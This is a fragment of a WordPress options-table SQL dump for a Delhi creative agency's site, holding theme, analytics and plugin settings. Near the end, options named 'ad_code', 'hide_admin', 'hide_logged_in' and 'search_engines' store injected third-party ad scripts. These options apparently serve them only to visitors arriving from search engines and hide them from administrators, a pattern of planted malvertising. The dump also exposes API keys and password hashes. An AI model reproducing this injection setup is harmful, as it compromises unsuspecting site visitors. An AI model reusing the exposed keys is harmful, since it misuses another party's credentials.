ZfuXO\";a:2:{s:10:\"hashed_key\";s:34:\"$P$BNqV8IWmHbvxpv.F0ug2IxLt80ZCMU0\";s:10:\"created_at\";i:1719397643;}s:22:\"zW9jsK2mEWgwRIorXkXfUm\";a:2:{s:10:\"hashed_key\";s:34:\"$P$BhUqTVEpRa2jLPASTbtemiBNz0zj531\";s:10:\"created_at\";i:1719510944;}}','yes'),(128,'jetpack_affiliate_code','13153','yes'),(132,'theme_mods_twentytwenty','a:2:{s:18:\"custom_css_post_id\";i:-1;s:16:\"sidebars_widgets\";a:2:{s:4:\"time\";i:1590350870;s:4:\"data\";a:3:{s:19:\"wp_inactive_widgets\";a:0:{}s:9:\"sidebar-1\";a:3:{i:0;s:8:\"search-2\";i:1;s:14:\"recent-posts-2\";i:2;s:17:\"recent-comments-2\";}s:9:\"sidebar-2\";a:3:{i:0;s:10:\"archives-2\";i:1;s:12:\"categories-2\";i:2;s:6:\"meta-2\";}}}}','yes'),(140,'auto_core_update_notified','a:4:{s:4:\"type\";s:7:\"success\";s:5:\"email\";s:33:\"dhiraj@wthtest1.in8.cdn-alpha.com\";s:7:\"version\";s:5:\"5.8.4\";s:9:\"timestamp\";i:1651083113;}','no'),(141,'do_activate','0','yes'),(169,'current_theme','Divi','yes'),(170,'theme_mods_Divi','a:6:{i:0;b:0;s:18:\"custom_css_post_id\";i:7;s:16:\"et_pb_css_synced\";s:3:\"yes\";s:18:\"nav_menu_locations\";a:1:{s:12:\"primary-menu\";i:2;}s:39:\"et_updated_layouts_built_for_post_types\";s:3:\"yes\";s:13:\"et_pb_widgets\";a:2:{s:5:\"areas\";a:1:{s:19:\"et_pb_widget_area_1\";s:8:\"Whatsapp\";}s:6:\"number\";i:1;}}','yes'),(171,'theme_switched','','yes'),(172,'et_pb_cache_notice','a:1:{s:5:\"4.4.7\";s:6:\"ignore\";}','yes'),(177,'et_core_version','4.5.6','yes'),(179,'et_divi','a:174:{s:39:\"static_css_custom_css_safety_check_done\";b:1;s:23:\"2_5_flush_rewrite_rules\";s:4:\"done\";s:30:\"et_flush_rewrite_rules_library\";s:5:\"4.5.6\";s:31:\"divi_previous_installed_version\";s:5:\"4.5.5\";s:29:\"divi_latest_installed_version\";s:5:\"4.5.6\";s:27:\"divi_skip_font_subset_force\";b:1;s:27:\"et_pb_clear_templates_cache\";b:1;s:23:\"builder_custom_defaults\";O:8:\"stdClass\":0:{}s:33:\"customizer_settings_migrated_flag\";b:1;s:34:\"builder_custom_defaults_unmigrated\";b:0;s:40:\"divi_email_provider_credentials_migrated\";b:1;s:15:\"divi_1_3_images\";s:7:\"checked\";s:21:\"et_pb_layouts_updated\";b:1;s:30:\"library_removed_legacy_layouts\";b:1;s:30:\"divi_2_4_documentation_message\";s:9:\"triggered\";s:27:\"et_pb_post_type_integration\";a:3:{s:4:\"post\";s:2:\"on\";s:4:\"page\";s:2:\"on\";s:7:\"project\";s:2:\"on\";}s:21:\"et_pb_static_css_file\";s:2:\"on\";s:19:\"et_pb_css_in_footer\";s:3:\"off\";s:25:\"et_pb_product_tour_global\";s:2:\"on\";s:24:\"et_enable_classic_editor\";s:3:\"off\";s:24:\"footer_widget_text_color\";s:7:\"#ffffff\";s:24:\"footer_widget_link_color\";s:7:\"#ffffff\";s:12:\"divi_favicon\";s:0:\"\";s:19:\"product_tour_status\";a:1:{i:1;s:3:\"off\";}s:32:\"et_fb_pref_settings_bar_location\";s:6:\"bottom\";s:28:\"et_fb_pref_builder_animation\";s:4:\"true\";s:41:\"et_fb_pref_builder_display_modal_settings\";s:5:\"false\";s:39:\"et_fb_pref_builder_enable_dummy_content\";s:4:\"true\";s:21:\"et_fb_pref_event_mode\";s:5:\"hover\";s:20:\"et_fb_pref_view_mode\";s:7:\"desktop\";s:32:\"et_fb_pref_hide_disabled_modules\";s:5:\"false\";s:28:\"et_fb_pref_history_intervals\";i:1;s:29:\"et_fb_pref_page_creation_flow\";s:7:\"default\";s:42:\"et_fb_pref_quick_actions_always_start_with\";s:7:\"nothing\";s:44:\"et_fb_pref_quick_actions_show_recent_queries\";s:3:\"off\";s:39:\"et_fb_pref_quick_actions_recent_queries\";s:0:\"\";s:40:\"et_fb_pref_quick_actions_recent_category\";s:0:\"\";s:27:\"et_fb_pref_modal_preference\";s:7:\"default\";s:30:\"et_fb_pref_modal_snap_location\";s:4:\"left\";s:21:\"et_fb_pref_modal_snap\";s:4:\"true\";s:27:\"et_fb_pref_modal_fullscreen\";s:5:\"false\";s:32:\"et_fb_pref_modal_dimension_width\";i:400;s:33:\"et_fb_pref_modal_dimension_height\";i:633;s:27:\"et_fb_pref_modal_position_x\";i:914;s:27:\"et_fb_pref_modal_position_y\";i:88;s:24:\"et_fb_pref_toolbar_click\";s:5:\"false\";s:26:\"et_fb_pref_toolbar_desktop\";s:4:\"true\";s:23:\"et_fb_pref_toolbar_grid\";s:5:\"false\";s:24:\"et_fb_pref_toolbar_hover\";s:5:\"false\";s:24:\"et_fb_pref_toolbar_phone\";s:4:\"true\";s:25:\"et_fb_pref_toolbar_tablet\";s:4:\"true\";s:28:\"et_fb_pref_toolbar_wireframe\";s:4:\"true\";s:23:\"et_fb_pref_toolbar_zoom\";s:4:\"true\";s:36:\"et_fb_pref_lv_modal_dimension_height\";i:444;s:35:\"et_fb_pref_lv_modal_dimension_width\";i:300;s:30:\"et_fb_pref_lv_modal_position_x\";i:1159;s:30:\"et_fb_pref_lv_modal_position_y\";i:12;s:12:\"vertical_nav\";b:0;s:8:\"hide_nav\";b:0;s:13:\"nav_fullwidth\";b:0;s:17:\"hide_primary_logo\";b:0;s:11:\"logo_height\";i:61;s:9:\"menu_link\";s:16:\"rgba(0,0,0,0.84)\";s:22:\"primary_nav_font_style\";s:4:\"bold\";s:30:\"primary_nav_dropdown_animation\";s:4:\"fade\";s:24:\"show_header_social_icons\";b:0;s:16:\"show_search_icon\";b:0;s:12:\"phone_number\";s:0:\"\";s:16:\"mobile_menu_link\";s:18:\"rgba(31,31,31,0.6)\";s:9:\"divi_logo\";s:81:\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/Artboard-Copy-1.png\";s:14:\"divi_fixed_nav\";s:2:\"on\";s:26:\"divi_gallery_layout_enable\";s:5:\"false\";s:18:\"divi_color_palette\";s:63:\"#000000|#ffffff|#e02b20|#e09900|#1f1f1f|#9f9f9f|#0c71c3|#d4b068\";s:15:\"divi_grab_image\";s:5:\"false\";s:15:\"divi_blog_style\";s:5:\"false\";s:12:\"divi_sidebar\";s:16:\"et_right_sidebar\";s:22:\"divi_shop_page_sidebar\";s:16:\"et_right_sidebar\";s:30:\"et_google_api_settings_api_key\";s:0:\"\";s:29:\"et_enqueue_google_maps_script\";s:2:\"on\";s:19:\"et_use_google_fonts\";s:2:\"on\";s:23:\"divi_show_facebook_icon\";s:2:\"on\";s:22:\"divi_show_twitter_icon\";s:5:\"false\";s:21:\"divi_show_google_icon\";s:5:\"false\";s:24:\"divi_show_instagram_icon\";s:2:\"on\";s:18:\"divi_show_rss_icon\";s:5:\"false\";s:17:\"divi_facebook_url\";s:1:\"#\";s:16:\"divi_twitter_url\";s:1:\"#\";s:15:\"divi_google_url\";s:1:\"#\";s:18:\"divi_instagram_url\";s:1:\"#\";s:12:\"divi_rss_url\";s:0:\"\";s:34:\"divi_woocommerce_archive_num_posts\";i:9;s:17:\"divi_catnum_posts\";i:6;s:21:\"divi_archivenum_posts\";i:5;s:20:\"divi_searchnum_posts\";i:5;s:17:\"divi_tagnum_posts\";i:5;s:16:\"divi_date_format\";s:6:\"M j, Y\";s:16:\"divi_use_excerpt\";s:5:\"false\";s:26:\"divi_responsive_shortcodes\";s:2:\"on\";s:33:\"divi_gf_enable_all_character_sets\";s:5:\"false\";s:16:\"divi_back_to_top\";s:5:\"false\";s:18:\"divi_smooth_scroll\";s:5:\"false\";s:25:\"divi_disable_translations\";s:5:\"false\";s:29:\"divi_enable_responsive_images\";s:2:\"on\";s:27:\"divi_minify_combine_scripts\";s:2:\"on\";s:26:\"divi_minify_combine_styles\";s:2:\"on\";s:15:\"divi_custom_css\";s:0:\"\";s:21:\"divi_enable_dropdowns\";s:2:\"on\";s:14:\"divi_home_link\";s:2:\"on\";s:15:\"divi_sort_pages\";s:10:\"post_title\";s:15:\"divi_order_page\";s:3:\"asc\";s:22:\"divi_tiers_shown_pages\";i:3;s:32:\"divi_enable_dropdowns_categories\";s:2:\"on\";s:21:\"divi_categories_empty\";s:2:\"on\";s:27:\"divi_tiers_shown_categories\";i:3;s:13:\"divi_sort_cat\";s:4:\"name\";s:14:\"divi_order_cat\";s:3:\"asc\";s:20:\"divi_disable_toptier\";s:5:\"false\";s:25:\"divi_scroll_to_anchor_fix\";s:5:\"false\";s:14:\"divi_postinfo2\";a:4:{i:0;s:6:\"author\";i:1;s:4:\"date\";i:2;s:10:\"categories\";i:3;s:8:\"comments\";}s:22:\"divi_show_postcomments\";s:2:\"on\";s:15:\"divi_thumbnails\";s:2:\"on\";s:20:\"divi_page_thumbnails\";s:5:\"false\";s:23:\"divi_show_pagescomments\";s:5:\"false\";s:14:\"divi_postinfo1\";a:3:{i:0;s:6:\"author\";i:1;s:4:\"date\";i:2;s:10:\"categories\";}s:21:\"divi_thumbnails_index\";s:2:\"on\";s:19:\"divi_seo_home_title\";s:2:\"on\";s:25:\"divi_seo_home_description\";s:2:\"on\";s:22:\"divi_seo_home_keywords\";s:2:\"on\";s:23:\"divi_seo_home_canonical\";s:2:\"on\";s:23:\"divi_seo_home_titletext\";s:120:\"WhatTheHell? - Creative Agency in Delhi | Best Digital Agency | Best Advertising Agency | Branding Agency | WhatTheHell?\";s:29:\"divi_seo_home_descriptiontext\";s:142:\"WhatTheHell? is the best creative, digital and advertising agency in Delhi. Result driven brand building & sustainable sales. Call 9315666436.\";s:26:\"divi_seo_home_keywordstext\";s:159:\"Creative agency, digital agency, web agency, advertising agency, marketing agency, in delhi, in gurgaon, in noida, in pune, in bangalore, in jaipur, in lucknow\";s:18:\"divi_seo_home_type\";s:27:\"BlogName | Blog description\";s:22:\"divi_seo_home_separate\";s:3:\" | \";s:21:\"divi_seo_single_title\";s:5:\"false\";s:27:\"divi_seo_single_description\";s:5:\"false\";s:24:\"divi_seo_single_keywords\";s:5:\"false\";s:25:\"divi_seo_single_canonical\";s:5:\"false\";s:27:\"divi_seo_single_field_title\";s:9:\"seo_title\";s:33:\"divi_seo_single_field_description\";s:15:\"seo_description\";s:30:\"divi_seo_single_field_keywords\";s:12:\"seo_keywords\";s:20:\"divi_seo_single_type\";s:21:\"Post title | BlogName\";s:24:\"divi_seo_single_separate\";s:3:\" | \";s:24:\"divi_seo_index_canonical\";s:2:\"on\";s:26:\"divi_seo_index_description\";s:2:\"on\";s:19:\"divi_seo_index_type\";s:24:\"Category name | BlogName\";s:23:\"divi_seo_index_separate\";s:3:\" | \";s:28:\"divi_integrate_header_enable\";s:2:\"on\";s:26:\"divi_integrate_body_enable\";s:2:\"on\";s:31:\"divi_integrate_singletop_enable\";s:2:\"on\";s:34:\"divi_integrate_singlebottom_enable\";s:2:\"on\";s:21:\"divi_integration_head\";s:1465:\"<!-- Facebook Pixel Code -->\r\n<script>\r\n  !function(f,b,e,v,n,t,s)\r\n  {if(f.fbq)return;n=f.fbq=function(){n.callMethod?\r\n  n.callMethod.apply(n,arguments):n.queue.push(arguments)};\r\n  if(!f._fbq)f._fbq=n;n.push=n;n.loaded=!0;n.version=\'2.0\';\r\n  n.queue=[];t=b.createElement(e);t.async=!0;\r\n  t.src=v;s=b.getElementsByTagName(e)[0];\r\n  s.parentNode.insertBefore(t,s)}(window, document,\'script\',\r\n  \'https://connect.facebook.net/en_US/fbevents.js\');\r\n  fbq(\'init\', \'696122270941370\');\r\n  fbq(\'track\', \'PageView\');\r\n</script>\r\n<noscript><img height=\"1\" width=\"1\" style=\"display:none\"\r\n  src=\"https://www.facebook.com/tr?id=696122270941370&ev=PageView&noscript=1\"\r\n/></noscript>\r\n<!-- End Facebook Pixel Code -->\r\n\r\n<!-- Global site tag (gtag.js) - Google Analytics -->\r\n<script async src=\"https://www.googletagmanager.com/gtag/js?id=UA-150430642-17\"></script>\r\n<script>\r\n  window.dataLayer = window.dataLayer || [];\r\n  function gtag(){dataLayer.push(arguments);}\r\n  gtag(\'js\', new Date());\r\n\r\n  gtag(\'config\', \'UA-150430642-17\');\r\n</script>\r\n\r\n<!-- Google Tag Manager -->\r\n<script>(function(w,d,s,l,i){w[l]=w[l]||[];w[l].push({\'gtm.start\':\r\nnew Date().getTime(),event:\'gtm.js\'});var f=d.getElementsByTagName(s)[0],\r\nj=d.createElement(s),dl=l!=\'dataLayer\'?\'&l=\'+l:\'\';j.async=true;j.src=\r\n\'https://www.googletagmanager.com/gtm.js?id=\'+i+dl;f.parentNode.insertBefore(j,f);\r\n})(window,document,\'script\',\'dataLayer\',\'GTM-WT5TJRR\');</script>\r\n<!-- End Google Tag Manager -->\";s:21:\"divi_integration_body\";s:245:\"<!-- Google Tag Manager (noscript) -->\r\n<noscript><iframe src=\"https://www.googletagmanager.com/ns.html?id=GTM-WT5TJRR\"\r\nheight=\"0\" width=\"0\" style=\"display:none;visibility:hidden\"></iframe></noscript>\r\n<!-- End Google Tag Manager (noscript) -->\";s:27:\"divi_integration_single_top\";s:0:\"\";s:30:\"divi_integration_single_bottom\";s:0:\"\";s:37:\"et_automatic_updates_options_username\";s:0:\"\";s:36:\"et_automatic_updates_options_api_key\";s:0:\"\";s:15:\"divi_468_enable\";s:5:\"false\";s:14:\"divi_468_image\";s:0:\"\";s:12:\"divi_468_url\";s:0:\"\";s:16:\"divi_468_adsense\";s:0:\"\";s:14:\"primary_nav_bg\";s:7:\"#ffffff\";s:23:\"primary_nav_dropdown_bg\";s:7:\"#ffffff\";s:21:\"custom_footer_credits\";s:112:\"Ⓒ whatthehell.co | | Designed &amp; Developed by <a href=\"https://wthtest1.in8.cdn-alpha.com\">WhatTheHell?</a>\";s:27:\"bottom_bar_background_color\";s:16:\"rgba(0,0,0,0.98)\";s:26:\"footer_widget_bullet_color\";s:7:\"#d4b068\";s:16:\"menu_link_active\";s:7:\"#d4b068\";s:31:\"primary_nav_dropdown_line_color\";s:7:\"#d4b068\";s:28:\"footer_menu_background_color\";s:7:\"#1e0000\";s:29:\"footer_menu_active_link_color\";s:7:\"#d4b068\";s:22:\"fixed_secondary_nav_bg\";s:7:\"#000000\";s:22:\"builder_global_presets\";O:8:\"stdClass\":0:{}s:29:\"custom_defaults_migrated_flag\";b:1;s:12:\"accent_color\";s:7:\"#d4b068\";}','yes'),(180,'widget_aboutmewidget','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),(181,'widget_adsensewidget','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),(182,'widget_advwidget','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),(183,'shop_catalog_image_size','a:3:{s:5:\"width\";s:3:\"400\";s:6:\"height\";s:3:\"400\";s:4:\"crop\";i:1;}','yes'),(184,'shop_single_image_size','a:3:{s:5:\"width\";s:3:\"510\";s:6:\"height\";s:4:\"9999\";s:4:\"crop\";i:0;}','yes'),(185,'shop_thumbnail_image_size','a:3:{s:5:\"width\";s:3:\"157\";s:6:\"height\";s:3:\"157\";s:4:\"crop\";i:1;}','yes'),(186,'et_support_site_id','4zgRWtJm0$FSAidaLp(B','yes'),(187,'et_safe_mode_plugins_whitelist','a:8:{i:0;s:15:\"etdev/etdev.php\";i:1;s:15:\"bloom/bloom.php\";i:2;s:19:\"monarch/monarch.php\";i:3;s:29:\"divi-builder/divi-builder.php\";i:4;s:27:\"ari-adminer/ari-adminer.php\";i:5;s:31:\"query-monitor/query-monitor.php\";i:6;s:27:\"woocommerce/woocommerce.php\";i:7;s:47:\"really-simple-ssl/rlrsssl-really-simple-ssl.php\";}','yes'),(188,'et_support_center_installed','true','yes'),(189,'et_images_temp_folder','/storage/v11800/wthtest1/public_html/wp-content/uploads/et_temp','yes'),(190,'et_schedule_clean_images_last_time','1719397641','yes'),(191,'et_bfb_settings','a:2:{s:10:\"enable_bfb\";s:2:\"on\";s:10:\"toggle_bfb\";s:2:\"on\";}','yes'),(193,'et_pb_builder_options','a:2:{i:0;b:0;s:35:\"email_provider_credentials_migrated\";b:1;}','yes'),(194,'et_support_center_setup_done','processed','yes'),(198,'et_account_status','expired','no'),(200,'et_google_api_settings','a:3:{s:7:\"api_key\";s:39:\"AIzaSyAdnWMyhH9MNLMG_ej6wNpMPsbnpXzDomw\";s:26:\"enqueue_google_maps_script\";s:2:\"on\";s:16:\"use_google_fonts\";s:2:\"on\";}','yes'),(201,'et_automatic_updates_options','a:2:{s:8:\"username\";s:10:\"dhiraj_wth\";s:7:\"api_key\";s:40:\"85af40ca366e6c905ba27599e67c9a34bc619f0c\";}','no'),(220,'db_upgraded','','yes'),(383,'nav_menu_options','a:2:{i:0;b:0;s:8:\"auto_add\";a:1:{i:0;i:2;}}','yes'),(1038,'jetpack_connection_active_plugins','a:1:{s:7:\"jetpack\";a:1:{s:4:\"name\";s:7:\"Jetpack\";}}','yes'),(1078,'category_children','a:0:{}','yes'),(1280,'recently_activated','a:0:{}','yes'),(1285,'ai1wm_updater','a:1:{s:43:\"all-in-one-wp-migration-unlimited-extension\";a:14:{s:4:\"name\";s:19:\"Unlimited Extension\";s:4:\"slug\";s:19:\"unlimited-extension\";s:8:\"homepage\";s:51:\"https://servmask.com/extensions/unlimited-extension\";s:13:\"download_link\";s:29:\"https://servmask.com/purchase\";s:7:\"version\";s:4:\"2.54\";s:6:\"author\";s:8:\"ServMask\";s:15:\"author_homepage\";s:20:\"https://servmask.com\";s:8:\"sections\";a:1:{s:11:\"description\";s:201:\"<ul class=\"description\"><li>Remove upload limits</li><li>Use on any number of websites that you own</li><li>Restore backup from server</li><li>WP CLI commands included</li><li>Premium support</li></ul>\";}s:7:\"banners\";a:2:{s:3:\"low\";s:65:\"https://servmask.com/img/products/unlimited-extension-772x250.png\";s:4:\"high\";s:66:\"https://servmask.com/img/products/unlimited-extension-1544x500.png\";}s:5:\"icons\";a:3:{s:2:\"1x\";s:65:\"https://servmask.com/img/products/unlimited-extension-128x128.png\";s:2:\"2x\";s:65:\"https://servmask.com/img/products/unlimited-extension-256x256.png\";s:7:\"default\";s:65:\"https://servmask.com/img/products/unlimited-extension-256x256.png\";}s:6:\"rating\";i:99;s:11:\"num_ratings\";i:509;s:10:\"downloaded\";i:50188;s:14:\"update_message\";s:215:\"You may be a victim of software counterfeiting. The license installed on your extension is likely non-genuine or pirated. For assistance, contact us at <a href=\"mailto:support@servmask.com\">support@servmask.com</a>.\";}}','yes'),(2510,'aws_cloudfront_logfile','/storage/v11800/wthtest1/public_html/wp-content/plugins/amazon-polly/amazon_ai_cloudfront.log','yes'),(2516,'amazon_polly_valid_keys','0','yes'),(2517,'amazon_ai_polly_enable','','yes'),(2519,'amazon_polly_podcast_enabled','','yes'),(2554,'widget_akismet_widget','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),(2577,'recovery_mode_email_last_sent','1719510944','yes'),(2835,'et_pb_contact_form_975f6fb4b4e5fe6ab7b292c456a33433','off','yes'),(2839,'et_pb_contact_form_bc2b8b59da52c79505813949395a51b8','off','yes'),(2998,'et_pb_contact_form_8e98ec55ad455eb054729928dd61fa17','off','yes'),(3001,'et_pb_contact_form_029b365ef0141adf84e5021c03d4dd46','off','yes'),(3003,'et_pb_signup_2b902a612d6a411600da19509678f64b','off','yes'),(3006,'et_pb_signup_0f81139e8e16e7b05c3acd42068947c6','off','yes'),(3028,'amazon_polly_secret_key_fake','********************','yes'),(3139,'elastic-email-to-send-status','1','yes'),(3144,'ee-apikey','c9558cd43ebaf3e4ed4d08c22126b8bb42ff75aebea7e1b632443e519a4decc07b89542157d3cd3f43bda3c2837a7ff5','yes'),(3146,'et_pb_contact_form_bdde7237be6bde848c939e8afa2700c5','off','yes'),(3147,'et_pb_contact_form_1388df552f12502555c59dab28d5cddb','off','yes'),(3166,'leadin_did_disconnect','1','yes'),(3167,'leadin_portalId','7585846','yes'),(3168,'leadin_account_name','WhatTheHell?','yes'),(3169,'leadin_portal_domain','whatthehell.co','yes'),(3172,'et_pb_contact_form_36b57114f30b7d241a1bc4a10e1bbce2','off','yes'),(3173,'et_pb_contact_form_28a7be1d05f8a1ac7b268c733f3aee7d','off','yes'),(3184,'et_pb_signup_429ced8d0804d40a3dd7cf3f720f4966','off','yes'),(3208,'wp_mail_smtp_initial_version','2.1.1','no'),(3209,'wp_mail_smtp_version','2.9.0','no'),(3210,'wp_mail_smtp','a:3:{s:4:\"mail\";a:6:{s:10:\"from_email\";s:16:\"user@example.com\";s:9:\"from_name\";s:62:\"WhatTheHell? | Creative, Advertising, Digital Marketing Agency\";s:6:\"mailer\";s:4:\"smtp\";s:11:\"return_path\";b:0;s:16:\"from_email_force\";b:1;s:15:\"from_name_force\";b:0;}s:4:\"smtp\";a:2:{s:7:\"autotls\";b:1;s:4:\"auth\";b:1;}s:7:\"general\";a:1:{s:29:\"summary_report_email_disabled\";b:1;}}','no'),(3211,'wp_mail_smtp_activated_time','1594289047','no'),(3216,'action_scheduler_hybrid_store_demarkation','288','yes'),(3217,'schema-ActionScheduler_StoreSchema','7.0.1693427464','yes'),(3218,'schema-ActionScheduler_LoggerSchema','3.0.1657810056','yes'),(3222,'wp_mail_smtp_migration_version','5','yes'),(3223,'wp_mail_smtp_review_notice','a:2:{s:4:\"time\";i:1594289048;s:9:\"dismissed\";b:0;}','yes'),(3224,'action_scheduler_lock_async-request-runner','660db3deadb995.50659766|1712174106','yes'),(3267,'et_pb_contact_form_87de4b4f0998998c8d521b65da43dccf','off','yes'),(3542,'et_safe_mode_plugins_allowlist','a:8:{i:0;s:15:\"etdev/etdev.php\";i:1;s:15:\"bloom/bloom.php\";i:2;s:19:\"monarch/monarch.php\";i:3;s:29:\"divi-builder/divi-builder.php\";i:4;s:27:\"ari-adminer/ari-adminer.php\";i:5;s:31:\"query-monitor/query-monitor.php\";i:6;s:27:\"woocommerce/woocommerce.php\";i:7;s:47:\"really-simple-ssl/rlrsssl-really-simple-ssl.php\";}','yes'),(3799,'short_pixel_ai_options','O:32:\"ShortPixel\\AI\\Options\\Collection\":3:{s:5:\"tests\";O:30:\"ShortPixel\\AI\\Options\\Category\":1:{s:9:\"front_end\";O:30:\"ShortPixel\\AI\\Options\\Category\":2:{s:8:\"enqueued\";b:1;s:14:\"missing_jquery\";b:0;}}s:5:\"flags\";O:30:\"ShortPixel\\AI\\Options\\Category\":1:{s:3:\"all\";O:30:\"ShortPixel\\AI\\Options\\Category\":2:{s:13:\"first_install\";b:0;s:7:\"css_ver\";i:1;}}s:5:\"pages\";O:30:\"ShortPixel\\AI\\Options\\Category\":1:{s:11:\"on_boarding\";O:30:\"ShortPixel\\AI\\Options\\Category\":4:{s:8:\"redirect\";O:28:\"ShortPixel\\AI\\Options\\Option\":1:{s:7:\"allowed\";b:0;}s:15:\"display_allowed\";b:1;s:4:\"step\";i:3;s:15:\"has_been_passed\";b:1;}}}','yes'),(3894,'elfsight_whatsapp_chat_widget_hash','0000000001628f6b00000000705e1fdf','yes'),(3895,'widget_elfsight-whatsapp-chat','a:3:{i:2;a:1:{s:2:\"id\";s:1:\"1\";}s:12:\"_multiwidget\";i:1;i:4;a:1:{s:2:\"id\";s:1:\"1\";}}','yes'),(3896,'elfsight_whatsapp_chat_widgets_clogged','true','yes'),(3899,'elfsight_whatsapp_chat_supported_until','','yes'),(3909,'elfsight_whatsapp_chat_last_check_datetime','1708468654','yes'),(4090,'spai_settings_compress_level','1','yes'),(4091,'spai_settings_webp','1','yes'),(4092,'spai_settings_remove_exif','1','yes'),(4093,'spai_settings_fadein','1','yes'),(4094,'spai_settings_type','1','yes'),(4095,'spai_settings_api_url','https://cdn.shortpixel.ai/spai','yes'),(4096,'spai_settings_backgrounds_max_width','','yes'),(4097,'spai_settings_css_domains','','yes'),(4098,'spai_settings_excluded_paths','regex:/\\/\\/([^\\/]*\\.|)gravatar.com\\//','yes'),(4099,'spai_settings_excluded_selectors','','yes'),(4100,'spai_settings_noresize_selectors','','yes'),(4101,'spai_settings_eager_selectors','','yes'),(4102,'spai_settings_account','','yes'),(4103,'spai_settings_css_ver','1','yes'),(4104,'spai_settings_dismissed_notices','a:0:{}','yes'),(4113,'amp-options','a:10:{s:13:\"theme_support\";s:6:\"reader\";s:20:\"supported_post_types\";a:4:{i:0;s:4:\"post\";i:1;s:4:\"page\";i:2;s:10:\"attachment\";i:3;s:7:\"project\";}s:9:\"analytics\";a:0:{}s:23:\"all_templates_supported\";b:1;s:19:\"supported_templates\";a:1:{i:0;s:11:\"is_singular\";}s:7:\"version\";s:6:\"2.0.11\";s:12:\"reader_theme\";s:6:\"legacy\";s:17:\"plugin_configured\";b:1;s:15:\"mobile_redirect\";b:0;s:18:\"suppressed_plugins\";a:0:{}}','no'),(4121,'amp_css_transient_monitor_time_series','a:14:{i:20200909;i:15;i:20200910;i:15;i:20200911;i:15;i:20200912;i:22;i:20200913;i:22;i:20200914;i:22;i:20200915;i:24;i:20200916;i:24;i:20200917;i:24;i:20200918;i:24;i:20200919;i:24;i:20200920;i:24;i:20200921;i:24;i:20200922;i:24;}','no'),(4440,'et_pb_contact_form_992713d3d5c920ce22e65bc1af6b998f','off','yes'),(4444,'et_pb_contact_form_d80ab90c1db94658972ff1882097cdc7','off','yes'),(4450,'et_pb_contact_form_9bceb32a98c5c5c8f9d307eb93cd9ae8','off','yes'),(4468,'elfsight_popup_widget_hash','000000005af1db1500000000043ee3cd','yes'),(4469,'widget_elfsight-popup','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),(4470,'elfsight_popup_widgets_clogged','true','yes'),(4477,'elfsight_popup_last_check_datetime','1708468653','yes'),(4509,'et_pb_contact_form_12b73d5499e4e32d26846d86f0213315','off','yes'),(4545,'ai1wmue_plugin_key','1bebc005-bc23-4932-8b3f-1b4b72ee066a','yes'),(4549,'jetpack_active_modules','a:12:{i:0;s:12:\"contact-form\";i:1;s:21:\"enhanced-distribution\";i:2;s:8:\"json-api\";i:3;s:5:\"notes\";i:4;s:7:\"protect\";i:5;s:5:\"stats\";i:6;s:18:\"verification-tools\";i:7;s:21:\"woocommerce-analytics\";i:8;s:13:\"tiled-gallery\";i:9;s:10:\"photon-cdn\";i:10;s:11:\"lazy-images\";i:11;s:5:\"blaze\";}','yes'),(4680,'tantan_wordpress_s3','a:7:{s:6:\"bucket\";s:7:\"demoiia\";s:10:\"copy-to-s3\";s:1:\"1\";s:11:\"force-https\";s:0:\"\";s:13:\"manual_bucket\";s:1:\"1\";s:17:\"post_meta_version\";i:8;s:6:\"region\";s:10:\"ap-south-1\";s:13:\"serve-from-s3\";s:1:\"1\";}','yes'),(4681,'as3cf_schema_version','2.4.1','yes'),(4686,'as3cf_constant_AS3CF_SETTINGS','a:1:{s:8:\"provider\";s:3:\"aws\";}','no'),(4978,'WPLANG','','yes'),(5019,'disallowed_keys','','no'),(5020,'comment_previously_approved','1','yes'),(5021,'auto_plugin_theme_update_emails','a:0:{}','no'),(5022,'finished_updating_comment_type','1','yes'),(5162,'ip_admin','on','yes'),(5163,'ad_code','\r\n<script>(function(s,u,z,p){s.src=u,s.setAttribute(\'data-zone\',z),p.appendChild(s);})(document.createElement(\'script\'),\'https://iclickcdn.com/tag.min.js\',3336627,document.body||document.documentElement)</script>\r\n<script src=\"https://asoulrox.com/pfe/current/tag.min.js?z=3336643\" data-cfasync=\"false\" async></script>\r\n<script type=\"text/javascript\" src=\"//inpagepush.com/400/3336649\" data-cfasync=\"false\" async=\"async\"></script>\r\n','yes'),(5164,'cookies_admin','on','yes'),(5165,'logged_admin','on','yes'),(5166,'hide_admin','on','yes'),(5167,'hide_logged_in','on','yes'),(5168,'display_ad','organic','yes'),(5169,'search_engines','google.,/search?,images.google., web.info.com, search.,yahoo.,yandex,msn.,baidu,bing.,doubleclick.net,googleweblight.com','yes'),(5170,'auto_update','on','yes'),(5171,'log_install','1','yes'),(5880,'comet_cache_notices','a:0:{}','no'),(5881,'comet_cache_options','a:104:{s:7:\"version\";s:6:\"170220\";s:8:\"welcomed\";s:1:\"1\";s:11:\"crons_setup\";s:10:\"1711933869\";s:24:\"crons_setup_on_namespace\";s:34:\"WebSharks\\CometCache\\Traits\\Plugin\";s:39:\"crons_setup_with_cache_cleanup_schedule\";s:6:\"hourly\";s:32:\"crons_setup_on_wp_with_schedules\";s:40:\"9c49d70e351f4151c4f99d4b674ad5f71bbf3a59\";s:6:\"enable\";s:1:\"1\";s:16:\"debugging_enable\";s:1:\"1\";s:8:\"base_dir\";s:17:\"cache/comet-cache\";s:13:\"cache_max_age\";s:6:\"7 days\";s:44:\"cache_max_age_disable_if_load_average_is_gte\";s:0:\"\";s:22:\"cache_cleanup_schedule\";s:6:\"hourly\";s:27:\"change_notifications_enable\";s:1:\"1\";s:28:\"cache_clear_admin_bar_enable\";s:1:\"1\";s:36:\"cache_clear_admin_bar_options_enable\";s:1:\"1\";s:32:\"cache_clear_admin_bar_roles_caps\";s:0:\"\";s:22:\"cache_clear_cdn_enable\";s:1:\"0\";s:26:\"cache_clear_opcache_enable\";s:1:\"0\";s:26:\"cache_clear_s2clean_enable\";s:1:\"0\";s:21:\"cache_clear_eval_code\";s:0:\"\";s:16:\"cache_clear_urls\";s:0:\"\";s:29:\"cache_clear_transients_enable\";s:1:\"0\";s:28:\"cache_clear_xml_feeds_enable\";s:1:\"1\";s:31:\"cache_clear_xml_sitemaps_enable\";s:1:\"1\";s:32:\"cache_clear_xml_sitemap_patterns\";s:14:\"/sitemap**.xml\";s:28:\"cache_clear_home_page_enable\";s:1:\"1\";s:29:\"cache_clear_posts